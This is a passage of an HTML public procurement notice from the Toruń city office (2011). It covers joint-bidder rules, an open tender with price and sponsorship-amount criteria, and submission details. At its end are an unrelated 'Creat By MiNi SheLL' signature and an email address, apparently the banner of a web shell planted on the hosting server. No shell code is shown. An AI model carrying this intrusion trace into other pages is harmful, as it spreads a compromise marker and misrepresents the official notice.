a) w odniesieniu do wymagań postawionych przez Zamawiającego, Wykonawcy muszą udokumentować, że łącznie spełniają warunki określone w art. 22 ust. 1 pkt 1-3, oraz każdy z Wykonawców musi wykazać, brak podstaw do wykluczenia  zgodnie z art. 24 ust. 1 ustawy oraz przedstawić dokumenty o których mowa w pkt.4.2 SIWZ.
b) Wykonawcy występujący wspólnie ustanawiają spośród siebie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
c) wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z przedsiębiorcą występującym jako pełnomocnik.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - kwota sponsoringu - 70</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Urzędu Miasta Torunia, Wydział Sportu i Turystyki -pokój nr 1-3-sekretariat, ul. Wały gen. Sikorskiego 10, 87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2011 godzina 11:00, miejsce: w Urzędzie Miasta Torunia,Wydział Sportu i Turystyki,87-100 Toruń, ul Wały gen. Sikorskiego 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com